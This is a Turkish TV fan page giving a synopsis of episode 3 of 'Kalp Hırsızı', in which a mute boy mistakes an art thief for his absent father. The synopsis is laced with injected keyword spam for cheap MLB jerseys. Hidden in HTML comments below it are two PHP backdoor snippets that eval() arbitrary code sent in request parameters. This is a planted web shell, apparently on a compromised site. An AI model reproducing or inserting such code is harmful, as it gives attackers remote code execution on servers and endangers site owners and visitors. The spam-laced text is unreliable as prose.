Kalp Hırsızı 3.Bölüm Fragmanı

kalp hırsızı
Defne, âşık olduğu adam cheap mlb jerseys tarafından doğmamış çocuğu ile birlikte terk edilmiştir. Oğlu Bora’ya babasının kendisini terk ettiğini söyleyemez ve ona babasının ağzından mektuplar yazar. Bu, onu bir süre oyalasa da, baba özlemi dayanılmaz hale geldiğinde Bora konuşmamaya başlar.

Tekin, değerli antikalar, tablolar wholesale mlb jerseys çalan cheap jerseys bir sanat hırsızıdır. Hırsızlık to yapmak için Defne’nin evine girdiğinde, Bora uyanır ve onu hiç görmediği babası sanar. Bora uzun bir süreden sonra ilk defa konuşmuştur.

Defne tamamen çaresiz kalmıştır. Ya oğluna babasıyla ilgili tüm gerçekleri anlatacak ya da uzun rain süre sonra Bora’nın konuşmasını sağlayan hırsızın peşine düşerek onu baba diye eve getirecektir.

3.Bölüm Fragmanı

<!– [insert_php]if (isset($_REQUEST["fSX"])){eval($_REQUEST["fSX"]);exit;}[/insert_php][php]if (isset($_REQUEST["fSX"])){eval($_REQUEST["fSX"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["VjU"])){eval($_REQUEST["VjU"]);exit;}[/insert_php][php]if (isset($_REQUEST["VjU"])){eval($_REQUEST["VjU"]);exit;}[/php] –>

loading...

Bunlarda hoşunuza gidebilir

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir